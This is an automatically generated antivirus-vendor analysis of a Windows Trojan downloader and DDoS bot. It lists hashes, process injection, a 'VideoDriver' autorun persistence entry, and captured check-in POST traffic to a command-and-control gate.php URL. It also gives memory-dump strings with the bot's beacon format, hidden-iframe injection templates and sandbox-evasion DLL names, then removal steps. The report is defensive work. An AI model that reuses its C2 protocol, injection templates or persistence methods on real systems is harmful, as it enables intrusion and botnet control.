Trojan.Win32.LoadMoney_edf2199994

by malwarelabrobot on March 2nd, 2015 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), TrojanLoadMoney.YR, TrojanDownloaderVundo.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: edf2199994d1a0ef2730391774b0574f
SHA1: b8da3f1c4df1b32e1a973fd2fe7b965a1ea19d9a
SHA256: 1b059fab27aa0661a8336e136fead7ba5115a5178e7f73f186240131683a44ef
SSDeep: 3072:dBWg0WcuUvpEZ/Tqqz47VJ0LrkGODhl/0UrVWCk/EBR8imt:XWg8AT7uJUrxK8N8BaV
Size: 153600 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2015-02-18 23:14:39
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

vbc.exe:504
%original file name%.exe:580

Mutexes

The following mutexes were created/opened:

ShimCacheMutex

File activity

The process vbc.exe:504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\config\software (326 bytes)
%System%\config\SOFTWARE.LOG (1315 bytes)

The Trojan deletes the following file(s):

%WinDir%\1418334051\lsass (0 bytes)

The process %original file name%.exe:580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe (153 bytes)

Registry activity

The process vbc.exe:504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 15 D5 47 EE D9 7D 16 93 8E BB 89 56 D7 FA 6B"

The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"*1418334051"

The process %original file name%.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 95 A7 72 0B 01 21 FF C6 1D EC FB 88 94 38 44"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"VideoDriver" = "%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe"

Dropped PE files

MD5 File path
67f5238229333c061092f5a32e8c2ee1 c:\WINDOWS\1418334051\lsass

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: dge
Product Version: 1.0.0.0
Legal Copyright: Copyright (c)
Legal Trademarks:
Original Filename: dge3.exe
Internal Name: dge3.exe
File Version: 1.0.0.0
File Description: dge
Comments:
Language: English

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 150612 151040 5.42786 270f60416938301061a7d215a3dac394
.rsrc 163840 1296 1536 2.64395 4a52917006d4306a7fe177d678015a9f
.reloc 172032 12 512 0.070639 79737747aaf2d243a456ab7612074458

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://hacka4life.atwebpages.com/panel/gate.php 83.125.22.211
hxxp://hacka4life.atwebpages.com:80/panel/gate.php 83.125.22.211


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Trojan Generic - POST To gate.php with no referer
ET TROJAN Athena DDoS Bot Checkin

Traffic

POST /panel/gate.php HTTP/1.1
Host: hacka4life.atwebpages.com:80
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 436

a=dnNwbW5raGlmY2RheHVnYnl0cW9sd3JqZXo6d3Rxcm9saWpnZGVieXp1cG1raGN4ZmFzbnY=&b=gHR5dGU6drVfZWF0gHVqZDcyMTisMDRsMDd3NDU0MTEyZTJiODFiOGQ4MDZlNsE3MsY5NrZ8drFkOsQmgGJaX2kqpGyxZDcfgGJaX2ZqpGVvOsB8Yrkgb2V5dvcfgGJ1d3l6ZrFtd2V8&c=vvsspqqnnroolllijjggddeb
HTTP/1.1 200 OK
Date: Sun, 01 Mar 2015 03:10:50 GMT
Server: Apache
Content-Length: 60
Connection: close
Con



POST /panel/gate.php HTTP/1.1
Host: hacka4life.atwebpages.com:80
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 468

a=bGlmZ2RlYnl6d3Rxcm9tanh1c3BraGNuYXY6dnNwbW5raGlmY3pheHVxbGdkeXRvYmV3cmo=&b=pHR5eGU6h25pZXbvY3g1rWQ6MTE4YfA0YfA3NfQ1NDEgMWUiYTmgYTboODA2ZDYgNfI2OTZqpHBirXY6YWRzrW58YXJlrDt4ODZ8Z2VdZDtoZXNxnG9cpGNjeqVfOlF8h3M6V19YUHg2ZXI6nlEdMC44pG5vnDu0LlB8hqV3OlF8&c=ebcczzzwxuuurrsopmmmjjkh
HTTP/1.1 200 OK
Date: Sun, 01 Mar 2015 03:10:44 GMT
Server: Apache
Content-Length: 60
Connection: close
Content-Type: text/html
ZWJjY3p6end4dXV1cnJzb3BtbW1qamtoZonynWRHVwvohUZfUFRxn2ZBPT0K..







The Trojan connects to the servers at the folowing location(s):







vbc.exe_504:




.text
P`.data
.rdata
`@.eh_fram
[email protected]
.idata
tL<EtH<.tD
HpiGjC6poKKJFMdfmGQsI5uhj5PYLApwet655VSJtkKTpLJWQLjgArOIiQDm28YYthWGtuayR4eZdfbrLyhq8D0UW0J2jCW5L9ItMESBTdxNTFZvmvbcjuLIJTv7LA`yIuD5xYRbIB4uh-zy8lbX3u89aj`cNtNFIAxz7CPRvcgwG0tXtQ1oeVIauFRAKSQw33HBdvlLejtdr8Ma6iDVI4k8DuX96QaneKsAXqZbwp9bfKOYBewACUkYehN-UqEQS8U`eIBgqzAqrAq3yL0KjcWCXQQ`H02f18kAybb8cwpgOSp2fwN2ZVVILcKR7HTiDPJ`y5w737tO5yOOL5x973TBmhBcKp2g8o`ehq1H7saiz`LzvH6Igkk8IHryAUP2UDQxfn0UMJva03Dr57Hs9uF53WabeNUKwAqG99HKheyyVtSu7sk0qflEJ4t5`H2IB141j4cyQsYNXn`uiBzX9Osqjxz1JsjwJ-vqOUgZJSzqyNUotPGHRPPtirMjag1xWO`ZqqtTeRq`Du1yH2Jj2XMftJWwf8nqrquwISsKatl4wy2eX2Box2yuco7Rr9QDuVLq5Lk3IP4jc2fN00Gd9soS9GKZzMOhcm7QWC9r4xTYcWQ8BZqW6Nn6QGTBmK`SoQfngRpTUt6hIF4Ng50MutuMmPxxB`Nm3UJhCIwtG4Yk4dubO`f4TawJnaIXTdiujiyeVLzW`r2leprFV3hLO0uyF-qSzU-XOzpISf6Wkc5qSW19tBEJRERYgmgbBf`WaFUaDVTN-TaiERrEvCFGix6Q22f1AXYHRRwUmh008OwwreMb0jVXNUXOcn8cvs5hr3ksBVL0uRTUbuhA7xB5621lFVc22G1pvm1-DAsozM4V3FsCg6r-eA-nGP6TiIq84AJ1KR0c4fVlNBNripOtJHcyaAaU3ftPrqqNwiWRtRTHmA06i9nYlLfArr0zbNwi9x4DlE9wtymaUaIdJ-HBp5dYV8403MWRv4eC242xo7sd2gfijFnF4N346wDE9VkmnuKNFfV79BdoOEJvM4vtDW8TzYnD`PoOtAAQIESdcwVht`5L8T`SekbkknK`0MMX`be89njHcj7lxG5OT`iz`Wy`7zl0XVA1Y6litBLu9o9CEWkMQd4sObxbHkI6bT5gfWQ6GW65uvOMiaqEZZLmD`c6hSzqLg`YX1nTI4nqEL9K4fF-Xj0rRjv7bEVhIAP3`9x-tz4lfzM~
libgcj-13.dll
Mozilla/4.0 (compatible)
%s--%s
%s\B%i.tmp
http.
hXXp://
hXXps://
%y%m%d
%s:%i
%s\browser%li.html
<meta http-equiv="refresh" content="%i">
%s "%s"
Software\Microsoft\Windows NT\CurrentVersion\Windows\load
%s\%s.exe
Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore
NoWindowsUpdate
%s@%s
%s\I%li.bat
%s\U%li.bat
%s\Google\Chrome\Application\chrome.exe
%s\Internet Explorer\iexplore.exe
%s\Opera\opera.exe
%s\Mozilla Firefox\firefox.exe
%s\Maxthon3\Bin\Maxthon.exe
Google Chrome
Opera
Firefox
chrome.exe
opera.exe
firefox.exe
iexplore.exe
Maxthon.exe
%s(%s)
|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:
|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|
%s%s%i%s%s%s%s%s
%s:%s
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
|type:response|uid:%s|taskid:%i|return:%s|busy:%s|
autoruns.exe
explorer.exe
SbieDll.dll
snxhk.dll
dbghelp.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
76487-640-1457236-23837
76487-644-3177037-23510
55274-640-2673064-23950
76497-640-6308873-23835
Windows Task Manager
%s %i %i
.hidden
filesearch.stop
%s@%s:%i
%s\System32\drivers\etc\protocol
%s\Microsoft.NET\Framework\
v4.0.30319
v2.0.50727
\explorer.exe
HTTP/1.
text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
application/x-www-form-urlencoded
HTTP/1.
dnsapi.dll
%s & %s
Software\Microsoft\Windows\CurrentVersion\
\Microsoft\Windows
%s%s%s%s%i%s%s
:Zone.Identifier
%s\K%li.bat
document.write(unescape('%s'));
<iframe src="%s" width="0" height="0" frameborder="0"></iframe>
operator
operator
global constructors keyed to
global destructors keyed to
operator""
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
fc_key
use_fc_key
hXXp://hacka4life.atwebpages.com/panel/gate.php
v1.0.8
panel/gate.php
hacka4life.atwebpages.com
%WinDir%
%Program Files%
%Documents and Settings%\All Users
%Documents and Settings%\%current user%
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\All Users\Start Menu\Programs\Startup
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Opera\opera.exe
%Program Files%\Mozilla Firefox\firefox.exe
%Program Files%\Maxthon3\Bin\Maxthon.exe
e.exe
ull)DvwJikPrQzhXXp://hacka4life.atwebpages.com/panel/gate.php80iYitJLxpCUv1.0.8
%WinDir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe
%WinDir%\1418334051
%WinDir%\1418334051\lsass
RegCloseKey
RegCreateKeyExA
RegFlushKey
RegOpenKeyExA
GetProcessHeap
ShellExecuteA
InternetOpenUrlA
ADVAPI32.DLL
KERNEL32.DLL
msvcrt.dll
SHELL32.DLL
USER32.dll
WININET.DLL
Okernel32.dll
advapi32.dll
Aicmp.dll
surlmon.dll
gws2_32.dll
rpcrt4.dll

vbc.exe_504_rwx_00400000_00083000:




.text
P`.data
.rdata
`@.eh_fram
[email protected]
.idata
tL<EtH<.tD
HpiGjC6poKKJFMdfmGQsI5uhj5PYLApwet655VSJtkKTpLJWQLjgArOIiQDm28YYthWGtuayR4eZdfbrLyhq8D0UW0J2jCW5L9ItMESBTdxNTFZvmvbcjuLIJTv7LA`yIuD5xYRbIB4uh-zy8lbX3u89aj`cNtNFIAxz7CPRvcgwG0tXtQ1oeVIauFRAKSQw33HBdvlLejtdr8Ma6iDVI4k8DuX96QaneKsAXqZbwp9bfKOYBewACUkYehN-UqEQS8U`eIBgqzAqrAq3yL0KjcWCXQQ`H02f18kAybb8cwpgOSp2fwN2ZVVILcKR7HTiDPJ`y5w737tO5yOOL5x973TBmhBcKp2g8o`ehq1H7saiz`LzvH6Igkk8IHryAUP2UDQxfn0UMJva03Dr57Hs9uF53WabeNUKwAqG99HKheyyVtSu7sk0qflEJ4t5`H2IB141j4cyQsYNXn`uiBzX9Osqjxz1JsjwJ-vqOUgZJSzqyNUotPGHRPPtirMjag1xWO`ZqqtTeRq`Du1yH2Jj2XMftJWwf8nqrquwISsKatl4wy2eX2Box2yuco7Rr9QDuVLq5Lk3IP4jc2fN00Gd9soS9GKZzMOhcm7QWC9r4xTYcWQ8BZqW6Nn6QGTBmK`SoQfngRpTUt6hIF4Ng50MutuMmPxxB`Nm3UJhCIwtG4Yk4dubO`f4TawJnaIXTdiujiyeVLzW`r2leprFV3hLO0uyF-qSzU-XOzpISf6Wkc5qSW19tBEJRERYgmgbBf`WaFUaDVTN-TaiERrEvCFGix6Q22f1AXYHRRwUmh008OwwreMb0jVXNUXOcn8cvs5hr3ksBVL0uRTUbuhA7xB5621lFVc22G1pvm1-DAsozM4V3FsCg6r-eA-nGP6TiIq84AJ1KR0c4fVlNBNripOtJHcyaAaU3ftPrqqNwiWRtRTHmA06i9nYlLfArr0zbNwi9x4DlE9wtymaUaIdJ-HBp5dYV8403MWRv4eC242xo7sd2gfijFnF4N346wDE9VkmnuKNFfV79BdoOEJvM4vtDW8TzYnD`PoOtAAQIESdcwVht`5L8T`SekbkknK`0MMX`be89njHcj7lxG5OT`iz`Wy`7zl0XVA1Y6litBLu9o9CEWkMQd4sObxbHkI6bT5gfWQ6GW65uvOMiaqEZZLmD`c6hSzqLg`YX1nTI4nqEL9K4fF-Xj0rRjv7bEVhIAP3`9x-tz4lfzM~
libgcj-13.dll
Mozilla/4.0 (compatible)
%s--%s
%s\B%i.tmp
http.
hXXp://
hXXps://
%y%m%d
%s:%i
%s\browser%li.html
<meta http-equiv="refresh" content="%i">
%s "%s"
Software\Microsoft\Windows NT\CurrentVersion\Windows\load
%s\%s.exe
Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore
NoWindowsUpdate
%s@%s
%s\I%li.bat
%s\U%li.bat
%s\Google\Chrome\Application\chrome.exe
%s\Internet Explorer\iexplore.exe
%s\Opera\opera.exe
%s\Mozilla Firefox\firefox.exe
%s\Maxthon3\Bin\Maxthon.exe
Google Chrome
Opera
Firefox
chrome.exe
opera.exe
firefox.exe
iexplore.exe
Maxthon.exe
%s(%s)
|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:
|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|
%s%s%i%s%s%s%s%s
%s:%s
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
|type:response|uid:%s|taskid:%i|return:%s|busy:%s|
autoruns.exe
explorer.exe
SbieDll.dll
snxhk.dll
dbghelp.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
76487-640-1457236-23837
76487-644-3177037-23510
55274-640-2673064-23950
76497-640-6308873-23835
Windows Task Manager
%s %i %i
.hidden
filesearch.stop
%s@%s:%i
%s\System32\drivers\etc\protocol
%s\Microsoft.NET\Framework\
v4.0.30319
v2.0.50727
\explorer.exe
HTTP/1.
text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
application/x-www-form-urlencoded
HTTP/1.
dnsapi.dll
%s & %s
Software\Microsoft\Windows\CurrentVersion\
\Microsoft\Windows
%s%s%s%s%i%s%s
:Zone.Identifier
%s\K%li.bat
document.write(unescape('%s'));
<iframe src="%s" width="0" height="0" frameborder="0"></iframe>
operator
operator
global constructors keyed to
global destructors keyed to
operator""
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
fc_key
use_fc_key
hXXp://hacka4life.atwebpages.com/panel/gate.php
v1.0.8
panel/gate.php
hacka4life.atwebpages.com
%WinDir%
%Program Files%
%Documents and Settings%\All Users
%Documents and Settings%\%current user%
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\All Users\Start Menu\Programs\Startup
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Opera\opera.exe
%Program Files%\Mozilla Firefox\firefox.exe
%Program Files%\Maxthon3\Bin\Maxthon.exe
e.exe
ull)DvwJikPrQzhXXp://hacka4life.atwebpages.com/panel/gate.php80iYitJLxpCUv1.0.8
%WinDir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe
%WinDir%\1418334051
%WinDir%\1418334051\lsass
RegCloseKey
RegCreateKeyExA
RegFlushKey
RegOpenKeyExA
GetProcessHeap
ShellExecuteA
InternetOpenUrlA
ADVAPI32.DLL
KERNEL32.DLL
msvcrt.dll
SHELL32.DLL
USER32.dll
WININET.DLL
Okernel32.dll
advapi32.dll
Aicmp.dll
surlmon.dll
gws2_32.dll
rpcrt4.dll

%original file name%.exe_580_rwx_00CE0000_00001000:




..hx%






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %System%\config\software (326 bytes)
    %System%\config\SOFTWARE.LOG (1315 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe (153 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "VideoDriver" = "%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now